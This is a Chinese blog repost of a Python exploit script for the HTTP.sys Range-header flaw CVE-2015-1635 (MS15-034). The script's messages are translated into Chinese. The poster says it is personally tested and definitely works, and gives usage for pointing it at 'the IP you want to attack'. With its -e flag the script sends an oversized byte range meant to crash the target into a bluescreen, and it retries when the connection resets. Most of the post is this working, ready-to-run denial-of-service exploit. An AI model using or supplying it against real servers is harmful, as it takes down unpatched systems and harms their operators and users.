A-A+
http-cve2015-1635 EXP HTTP.sys 远程执行代码(CVE-2015-1635 MS15-034)
本执行代码转载网络来源地址:http://www.securitysift.com/an-analysis-of-ms15-034/
本人经过汉化了,如果看着汉化的不顺眼可以自己去用原版。。。。
http-vuln-cve2015-1635.nse HTTP.sys 远程执行代码exp
网上的试验了几个都不好使,不知道为什么,但是下面的这个本人亲测,绝对可以用de POC。
把下方代码保存为 xxxx.py 试用方法: xxxx.py http://ip(换成你要攻击的IP) -e (使用这个参数表示开始攻击。)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 | #!/usr/bin/python #coding=utf8 import urllib2 import sys import argparse import socket ''' get cl args ''' def getArgs(): parser = argparse.ArgumentParser( prog="ms15_034.py", formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=50), epilog= "这个脚本将测试存在或利用DOS状态ms15_034") parser.add_argument("target", help="Target Host in the form of http://[host]:[port] -- specify port only if not 80" ) parser.add_argument("-p", "--path", default="/welcome.png", help="资源在目标服务器上的路径 默认 [default = /welcome.png] 上面是win7的 /iis-85.png 是win2012的") parser.add_argument("-e", "--exploit", action="store_true", default=False, help="加上此参数则表示攻击此服务器 默认 [default = False]") parser.add_argument("-r", "--range", default="0-18446744073709551615", help="修改头部代码 默认 [default=0-18446744073709551615]; 这可能会导致对方服务器蓝屏!!!") args = parser.parse_args() return args ''' make the evil request and examine response to determine vulnerability ''' def evilRequest(req, exploit): res = "" if exploit: print "[*] 尝试测试中..." try: res = urllib2.urlopen(req).read() # make request if exploit: print "[*] 无法解析响应,检查目标,请查看是否成功!" else: print "[*] 请求成功,可能不易受攻击" # 如果没有返回错误,目标可能是不易受攻击的 except: if "Requested Range Not Satisfiable" in str(sys.exc_info()[1]): # response if target is unpatched print "[*] 恭喜恭喜它有漏洞呦!!!" elif "The Request has an invalid header name" in str(sys.exc_info()[1]): # typical response if target is patched print "[*] 目标出现了" elif (("Connection reset by peer" in str(sys.exc_info()[1])) or ("forcibly closed" in str(sys.exc_info()[1]))) and (exploit): # often DoS exploit not successful on first attempt print "[*] 连接复位,重新尝试利用..." res = evilRequest(req, exploit) elif ("timed out" in str(sys.exc_info()[1])) and (exploit): # prevent loop after DoS function (used w/ socket timeout variable in main) print "[*] 请求超时,可能成功了呦。" elif ("timed out" in str(sys.exc_info()[1])) and (not exploit): # prevent loop after DoS function (used w/ socket timeout variable in main) print "[*] 请求超时,但利用开关不使用。你有没修改文件头大小?" else: print "[*] 不能确定目标是否有漏洞" # any other response means vuln unknown print "\t[+] Response: %s" % str(sys.exc_info()[1]) # print server response return res ''' main ''' def main(): print print '=============================================================================' print '| ms15_034.py - Test and DoS exploit |' print '| Author: Mike Czumak (T_v3rn1x) - @SecuritySift |' print '| 虾米汉化 URL地址:https://woj.app/ |' print '=============================================================================\n' args = getArgs() target = args.target # target server path = args.path # path to resource to retrieve on target server range = args.range # value of Range header exploit = args.exploit # boolean (exploit DoS or not) if exploit: range = "18-18446744073709551615" # evil range if requesting welcome.png # may need to change if requesting different resource (use range arg instead) print "[*] Making request to " + target print "\t[+] Target path: " + path print "\t[+] Range Header: " + range print "\t[+] Exploit (DoS)?: " + str(exploit) print socket.setdefaulttimeout(10) # timeout the connection in event of DoS/reboot req = urllib2.Request( "%s%s"%(target,path), headers={ "Range" : "bytes=%s" % range }) # format request res = evilRequest(req, exploit) # make request print if __name__ == '__main__': main() |
布施恩德可便相知重
微信扫一扫打赏
支付宝扫一扫打赏